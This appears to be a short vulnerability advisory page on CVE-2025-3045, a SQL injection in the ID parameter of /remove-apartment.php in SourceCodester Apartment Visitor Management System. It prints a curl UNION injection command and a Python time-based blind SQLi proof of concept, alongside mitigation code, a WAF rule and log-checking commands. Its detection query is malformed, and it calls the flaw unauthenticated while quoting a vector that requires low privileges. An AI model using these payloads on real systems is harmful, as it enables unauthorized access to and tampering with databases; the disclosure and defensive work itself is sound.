SourceCodester Apartment Visitor Management System, SQL Injection, CVE-2025-3045 (Critical)

Listen to this Post

How CVE-2025-3045 Works

The vulnerability exists in `/remove-apartment.php` due to improper sanitization of the `ID` parameter. Attackers can inject malicious SQL queries through this parameter, allowing unauthorized database access. The application fails to use prepared statements, enabling attackers to manipulate queries. Remote exploitation is possible without authentication, leading to data theft, modification, or deletion. The CVSS 4.0 vector (AV:N/AC:L/PR:L/UI:N) confirms network-based attacks with low complexity. Public exploit availability increases the risk of widespread abuse.

DailyCVE Form

Platform: SourceCodester AVMS
Version: 1.0
Vulnerability: SQL Injection
Severity: Critical
Date: 05/28/2025

Prediction: Patch expected by 06/15/2025

What Undercode Say:

Analytics:

  • Exploitability Index: High (PoC available)
  • Affected Component: `/remove-apartment.php`
    – Attack Vector: HTTP request manipulation

Exploit Command:

curl -X POST "http://target.com/remove-apartment.php" -d "ID=1' UNION SELECT 1,2,3,4,5-- -"

Proof-of-Concept Code:

import requests
target = "http://victim.com/remove-apartment.php"
payload = {"ID": "1' AND (SELECT 1 FROM (SELECT(SLEEP(5)))abc)--"}
response = requests.post(target, data=payload)
if response.elapsed.total_seconds() >= 5:
print("[+] Vulnerable to SQLi")

Mitigation Steps:

1. Input Validation:

$id = mysqli_real_escape_string($conn, $_POST['ID']);

2. Use Prepared Statements:

$stmt = $conn->prepare("DELETE FROM apartments WHERE id = ?");
$stmt->bind_param("i", $id);

Detection Command:

SELECT FROM logs WHERE request LIKE '%remove-apartment.php%ID=%--%';

WAF Rule:

SecRule ARGS:ID "@detectSQLi" "id:1005,deny,status:403"

Patch Verification:

grep -r "prepare(" /var/www/html/

Backup Recommendation:

mysqldump -u root -p avms_db > backup_prepatch.sql

Log Analysis:

tail -f /var/log/apache2/access.log | grep 'remove-apartment.php'

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top